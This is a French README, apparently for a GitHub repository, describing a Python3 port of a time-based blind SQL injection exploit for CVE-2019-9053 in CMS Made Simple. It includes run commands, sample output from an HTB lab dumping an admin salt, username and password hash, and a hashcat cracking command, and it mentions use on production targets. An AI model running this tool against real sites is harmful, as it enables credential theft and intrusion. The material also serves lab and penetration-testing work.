
Exploit Python3 pour CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Aucune dépendance, SQLi aveugle temporelle → extraction des identifiants admin. Writeup HTB possédé.
Port Python3 pur de l'original Exploit-DB #46635 par Daniele Scanu. SQLi aveugle basé sur le temps pour extraire les identifiants administrateur des installations vulnérables de CMS Made Simple.
✅ Aucune dépendance externe (uniquement requests)
✅ Natif Python 3.6+ (f-strings, opérateur morse)
✅ Sortie colorée élégante (ANSI)
✅ Stable et rapide (~3-5 min d'extraction sur connexions moyennes)
✅ Gestion des timeouts/erreurs pour cibles en production
✅ Sortie prête pour Hashcat (format salt + MD5)
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt
TIME = 3 # Sleep time (slower = more stable)
timeout = 20 # Request timeout
chars = '...' # Custom charset
Auteur original : Daniele Scanu
Exploit-DB : #46635
Port Python3 et améliorations : Tim Karov
Licence MIT - Voir LICENSE
⭐ Mettez une étoile si utile ! Utilisé dans les laboratoires HTB/TryHackMe et les tests d'intrusion réels.